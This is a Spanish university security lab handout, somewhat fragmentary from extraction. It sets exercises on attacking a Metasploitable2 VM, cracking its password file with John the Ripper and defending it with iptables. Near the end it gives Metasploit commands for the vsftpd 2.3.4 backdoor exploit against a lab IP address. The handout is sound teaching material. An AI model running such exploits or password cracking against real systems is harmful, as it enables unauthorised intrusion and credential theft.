Professional Documents
Culture Documents
Práctica 1
1. Introducción
En esta práctica vamos a simular un ataque a una máquina Linux (vulnerable). Para ello vamos a
necesitar dos servidores, uno será el vulnerable y otro para lanzar la auditoría de seguridad sobre
el entorno vulnerable.
Software necesario:
2. Práctica
Se pide:
i. Utilizar al menos 3 vulnerabilidades diferentes para entrar a la máquina Metasploitable2.
(3 Puntos)
ii. Extraer el fichero de contraseñas de la MV Metasploitable2 y mediante el uso del software
John the Ripper conseguir la contraseña por defecto del usuario msfadmin. (2 puntos)
iii. Modificar la contraseña de msfadmin por otra de 6 caracteres e intentar romperla de
nuevo. ¿Cuánto tiempo tarda? (2 puntos)
iv. Implementar un firewall en la máquina mediante el uso de iptables que impida al atacante
acceder a la máquina. (3 puntos)
Se deberá entregar una memoria indicando en cada apartado la resolución con los pasos
seguidos en cada uno y aportando imágenes (“pantallazos”).
1
Seguridad Informática. Práctica 1
A.1. Virtualbox
https://www.virtualbox.org/wiki/Downloads
A.2. Metasploitable
2
Seguridad Informática. Práctica 1
https://www.kali.org/downloads/
Para entornos virtualizados:
https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/
B. Instalación en VirtualBox
B.1. Máquina Virtual Metaspotaible
Una vez descargado el software se deberá añadir a un entorno virtual. A continuación,
mostramos cómo se realizaría en VirtualBox
3
Seguridad Informática. Práctica 1
Usuario/clave: msfadmin/msfadmin
sudo <Dir_instalación>/katoolin
Una vez lanzada la aplicación, lo primero es añadir los repositorios y actualizarlos (opción
n 1 y 2). (Para ir atrás en el menú usar back)
En la pantalla principal seleccionamos la opción “2” para que nos muestre las categorías
de las herramientas disponibles.
Una vez aquí, podemos instalar todas las herramientas necesarias para la práctica.
4
Seguridad Informática. Práctica 1
Adaptador Puente: con esta opción, se crea una tarjeta de red virtual en nuestro
ordenador. Esta tarjeta es la que utilizará nuestra máquina virtual para acceder a la red
externa, así que es como un ordenador físico más que se conecta a la red.
Red Interna: con esta opción conseguimos que se cree una red a la que solo podrán
acceder las máquinas virtuales, de modo que siempre se pueden conectar entre ellas,
pero no a la red física.
NAT: si elegimos esto, la dirección de red de la máquina virtual será la misma que la de
nuestra máquina física, pudiendo salir a Internet con nuestra dirección IP.
msfdb init
msfconsole
5
Seguridad Informática. Práctica 1
Con eso conseguiremos un listado de los servicios que corren en cada puerto de la máquina
con sus versiones correspondientes.
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set rhost 192.168.1.232
set rport 21
exploit
Verificamos que el exploit ha funcionado.